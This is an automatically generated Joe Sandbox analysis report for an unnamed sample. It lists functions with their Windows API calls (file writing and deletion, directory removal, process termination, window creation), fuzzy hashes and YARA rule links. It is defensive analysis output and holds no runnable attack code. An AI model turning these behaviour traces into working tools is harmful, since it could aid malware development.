Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: EnvironmentVariable
String ID: $0A
API String ID: 1431749950-513306843
Opcode ID: c92aad9fdd5c3c8ab1daeb637eb2d23f1451a042da96c25929af1641449dc86f
Instruction ID: aa531fc2ff4271b490b4da26c39a2883f909eecf40e951fe565ba9eea3f0378e
Opcode Fuzzy Hash: c92aad9fdd5c3c8ab1daeb637eb2d23f1451a042da96c25929af1641449dc86f
Instruction Fuzzy Hash: 36C012B0204201ABD710CA04CD04B67BBE4EB50345F00C43EB184913B1C338CC40DB05

Function 0040B440 Relevance: 3.1, APIs: 2, Instructions: 65
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DB18: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
Part of subcall function 0040DB18: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E

CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000), ref: 0040B473
HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B495

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalSection$AllocCreateEnterFileHeapLeave
String ID:
API String ID: 3705299215-0
Opcode ID: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
Instruction ID: 11d32f41a61cd8df30a66e4113f3bfff31ba723ad3a0b0249673477e2beeffa2
Opcode Fuzzy Hash: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
Instruction Fuzzy Hash: 62119371200304ABC2305F1ADC44B57BBF8EBC5764F14823EF565A37E1C77599158BA8

Function 0040E266 Relevance: 3.1, APIs: 2, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E3B9: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040E277,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 0040E3FA

RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
memset.MSVCRT ref: 0040E2D1

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Heap$AllocateFreememset
String ID:
API String ID: 2774703448-0
Opcode ID: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
Instruction ID: 6d5d9c53e9755405ffb3e8ab18b4b48e318f9db4ecaa07005482283559b0ef73
Opcode Fuzzy Hash: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
Instruction Fuzzy Hash: 5D117F72504314ABC320DF0AD944A4BBBE8EF88710F01492EF988A7351D774ED108BA5

Function 00401FBA Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

RemoveDirectoryW.KERNEL32(00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00402011
RemoveDirectoryW.KERNEL32(00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 0040201C

Part of subcall function 004053C1: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000), ref: 004053D1

Part of subcall function 00405430: TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405440
Part of subcall function 00405430: EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040544C
Part of subcall function 00405430: LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405480

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalDirectoryRemoveSection$EnterLeaveObjectSingleTerminateThreadValueWait
String ID:
API String ID: 1205394408-0
Opcode ID: 80bbef749e469d8075b69d7c5fbc03918b8729a07b9c497950af765b831500ca
Instruction ID: d40c1fb095c70f871a48011b079aac708deae745ba771cefaa1841cdafdcac49
Opcode Fuzzy Hash: 80bbef749e469d8075b69d7c5fbc03918b8729a07b9c497950af765b831500ca
Instruction Fuzzy Hash: 72F0C034454604ABCA117B72FC82D5B3E6AEB1434CB05893EF544700B2CF3A5869AA5E

Function 0040AE39 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000002,00000080,0040AE72,02139760,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040AE50
DeleteFileW.KERNELBASE(00000000,0040AE72,02139760,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040AE5A

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
Instruction ID: 9bbbf45483326d305172a49cd8f3e34a401707f8027ad8c24340846d3084d85d
Opcode Fuzzy Hash: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
Instruction Fuzzy Hash: 36D09E30488300BBD7555B20DD0D75B7EA16F90745F08CC79B585610F1C7788C64EB4A

Function 0040E4D0 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7

Part of subcall function 0040ED40: HeapAlloc.KERNEL32(02130000,00000000,0000000C,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED4E
Part of subcall function 0040ED40: HeapAlloc.KERNEL32(02130000,00000000,00000010,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED62
Part of subcall function 0040ED40: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED8B

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocHeap$CreateValue
String ID:
API String ID: 493873155-0
Opcode ID: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
Instruction ID: 280f0189a1b64710240dfbe11500258ab370f1237584088fdcd0bc4150eb2939
Opcode Fuzzy Hash: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
Instruction Fuzzy Hash: F1D012705C83046BE7002BB2BC4A7843A78DB04751F20843AFA095B3D0DAB45480895D

Function 0040E500 Relevance: 3.0, APIs: 2, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNELBASE(02130000,?,004011C0,00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007), ref: 0040E509
TlsFree.KERNELBASE(0000000D,?,004011C0,00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007), ref: 0040E516

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: DestroyFreeHeap
String ID:
API String ID: 3293292866-0
Opcode ID: 875c8584e72ba4f9f6744ae97eca28bebe5277f14eb27a090d40f9eb6c4fb1f8
Instruction ID: d3e7c01ca3d7982612482afa56f4a58b9e79d24a02adeb1917deb37a1309afc3
Opcode Fuzzy Hash: 875c8584e72ba4f9f6744ae97eca28bebe5277f14eb27a090d40f9eb6c4fb1f8
Instruction Fuzzy Hash: D8C04C71158208ABCB049BA8FD488D63BBDE7486013448578B50D837A1DA75E840CB58

Function 0040B050 Relevance: 2.5, APIs: 2, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040B093
CloseHandle.KERNELBASE(00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B09B

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CloseFreeHandleHeap
String ID:
API String ID: 1642312469-0
Opcode ID: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
Instruction ID: 7abf06afc9ef833db34d05f69b67e4dbbe1385027aa9b24abf0250c41048a97e
Opcode Fuzzy Hash: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
Instruction Fuzzy Hash: 1AF08C32505110ABC6322B6AEC09E8BBA72EF81724F148A3FF125314F4CB794850DF9C

Function 00402BA6 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

Part of subcall function 0040A220: RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231

GetShortPathNameW.KERNEL32(02139760,02139760,00002710), ref: 00402BE0

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02130000,00000000,?), ref: 0040E599

Part of subcall function 0040A200: HeapFree.KERNEL32(00000000,00000000,00401B7C,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0040A20C

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178

Part of subcall function 0040E5F0: HeapFree.KERNEL32(02130000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
String ID:
API String ID: 192546213-0
Opcode ID: f052a35f039049b8e927063d295d98a1685d0b83d51531e0627689d3041be432
Instruction ID: cfcced4fe20ace1cb9c77e507b1d6c1eac9b345b0de8df7ff04b6d7fabcc8d03
Opcode Fuzzy Hash: f052a35f039049b8e927063d295d98a1685d0b83d51531e0627689d3041be432
Instruction Fuzzy Hash: ED012975108205BAE501BB72DD06D3F7669EF80718F108C3EB444B50E2EA3D9C616A2E

Function 0040B0C0 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040B088,00000000,00000000,?,?,00403394,00000000,00000000,00000800), ref: 0040B0E7

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
Instruction ID: 9ab85608ef899c62796374e569d53c100cb89dcb0d5a9370bd5502097d7715ab
Opcode Fuzzy Hash: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
Instruction Fuzzy Hash: F4F0F276104601AFD320CF58D808B87FBE8EB48321F00C82EE59AC2A50C730E810DB55

Function 00402B6D Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402B89

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
Instruction ID: 9093739e4f63ff22c3e940b982bbbee8e150dd58fd9266ea6ee1473296d97692
Opcode Fuzzy Hash: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
Instruction Fuzzy Hash: EBD0C26041810846D710BE658509B9B73E8D700304F608C3AE084961C1F3FCE9D5821B

Function 00409F4C Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(02139760,00000000), ref: 00409F5D

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 715b6f65d563b86cc3bdca33aaaaf00355598db4e158a89ac330bb58c24c5061
Instruction ID: 3777f5150e176a53f53c72294df7b811d779eaf56e205e5e018731d595f7ee1c
Opcode Fuzzy Hash: 715b6f65d563b86cc3bdca33aaaaf00355598db4e158a89ac330bb58c24c5061
Instruction Fuzzy Hash: 97D0927A91410CFBCB00CB84D945AD9B7FCEB09351F5041A5E904D3210DA35AE14ABA9

Function 0040A220 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
Instruction ID: b6192ce9428b1ba2f4eef992fd110c0ccadf60e3b61bfdacf1c665f796a5839f
Opcode Fuzzy Hash: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
Instruction Fuzzy Hash: 97C04C713442006AE6509B24DE09F5776A9BB70742F00C43A7545D11B4DA31D860D72D

Function 0040D944 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

TlsFree.KERNELBASE(004011E9,004011BB,00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074), ref: 0040D961

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Free
String ID:
API String ID: 3978063606-0
Opcode ID: 15811b3f4bfa737b04153fc01c2ce6e2fcfebc8c37dca603a4479fd71a9de331
Instruction ID: 46558f9b80a24c5afc9091c09e7b4622d133e72bbd02e604b330f91c0f3fc2b8
Opcode Fuzzy Hash: 15811b3f4bfa737b04153fc01c2ce6e2fcfebc8c37dca603a4479fd71a9de331
Instruction Fuzzy Hash: 15C0487080A200EEEF26ABA4ED0C7E13A71B34430AF84847A9005615F0EB78088CDB8C

Function 0040A1C0 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
Instruction ID: 5a0dfe59a05c5f03c374f6d2b2c7d0e1199ed08054282bce4923ddabcda8d052
Opcode Fuzzy Hash: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
Instruction Fuzzy Hash: 10B012702C43005AF2500B209C0AB8039609304B43F304024B2015A1D4CAF01080852C

Function 0040993E Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(00000000,000000FF,00403DE2,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000,?,00000000), ref: 00409946

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 81ec7d1a7ecaba98e0bd38f101adc261472a3716388094779b9fbb69d1566738
Instruction ID: 6c9933f8183c3cf90a70a052d5255c7038314b529614842de31663aab6e25bc5
Opcode Fuzzy Hash: 81ec7d1a7ecaba98e0bd38f101adc261472a3716388094779b9fbb69d1566738
Instruction Fuzzy Hash: DCB0127120C000BFCA00CB08CE04C057BB1AB513307108360B134410F4CB305814DB05

Function 0040A1B0 Relevance: 1.5, APIs: 1, Instructions: 3memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNELBASE(004011EE,004011BB,00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074), ref: 0040A1B6

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: DestroyHeap
String ID:
API String ID: 2435110975-0
Opcode ID: 5b23630fc93442f681a8b5ff80044f68663a3a9fb33361d4051a1176eb808dd7
Instruction ID: c9db44b6d67b1d9878fbeffb7de266838096d73083f09c44833cc4f7101008e2
Opcode Fuzzy Hash: 5b23630fc93442f681a8b5ff80044f68663a3a9fb33361d4051a1176eb808dd7
Instruction Fuzzy Hash: 30900270504000CBDF015B25EF0C4843E75E74030131091F59019400B1CA314451DA0C

Non-executed Functions

Function 00408F69 Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270windowregistrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B

GetStockObject.GDI32(00000011), ref: 00408FB2
LoadIconW.USER32 ref: 00408FE9
LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
RegisterClassExW.USER32 ref: 00409021
IsWindowEnabled.USER32(00000000), ref: 00409048
EnableWindow.USER32(00000000), ref: 00409059
GetSystemMetrics.USER32(00000001), ref: 00409091
GetSystemMetrics.USER32(00000000), ref: 0040909E
CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
wcslen.MSVCRT ref: 00409189
wcslen.MSVCRT ref: 00409191
SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
